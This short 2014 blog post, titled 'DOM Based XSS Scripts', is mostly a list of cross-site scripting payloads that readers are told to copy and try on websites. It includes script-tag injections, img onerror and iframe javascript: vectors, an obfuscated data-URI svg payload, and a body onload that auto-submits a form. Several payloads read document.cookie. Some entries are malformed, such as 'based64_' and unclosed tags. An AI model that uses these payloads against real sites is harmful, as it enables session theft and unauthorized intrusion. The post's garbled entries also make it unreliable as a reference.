Tuesday, 18 November 2014

DOM Based XSS Scripts

--> New:- Advance Scripts To Find XSS Vulnerabilities In  Websites.
Just Copy any script and try ..
To Redirect exploit code:
 ';redirecturl='javascript:alert("XSS")
 ';redirecturl='http://google.com/'

Now for XSS

Example: www. xyz.com?q=" XSS Script"

  • "/>alert("Xss:Priyanshu")
  • "/></script><script>alert(/XSS : Priyanshu/)</script>

<body onload=alert(1)>
"<body onload="alert('XSS by Priyanshu')">

"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>

<body onload=document.getElementById("xsrf").submit()>

<a href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(1)>">X</a

<a href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(document.cookie)>">X</a
  • http://test.com<script>alert(document.domain)</script>
  • http://test.com<script>alert(document.cookie)</script>

<img src=x onerror=alert(document.domain)>

x"></script><img src=x onerror=alert(1)>

q=" onclick="alert(/XSS/)

"><iframe src='javascript:prompt(/XSS/);'>

<iframe src="http://google.com"></iframe>

"><iframe src=a onload=alert('XSS')<

</script><script>alert(document.cookie)</script>

<xss>alert('xss')</xss>

<iframe src="http://google.com"></iframe>


  • /default.aspx#"><img src=x onerror=prompt('XSS');>
  •  /default.aspx#"><img src=x onerror=prompt('0');>    

<img src=x onerror=prompt(1);> by ">

“><img src=x onerror=prompt(0)>.txt.jpg

“><img src=x onerror=alert(document.cookie)>


 "><img src=x onerror=prompt(1);>

"><script>alert('XSS')</script>

id=abc"><Script>alert(/xss/)</SCRIPT>


"><img src=" " onMouseover=prompt(/xss/);>

Default.aspx/" onmouseout="confirm(1)'x="
ADD THE FACEBOOK WIDGET CODE HERE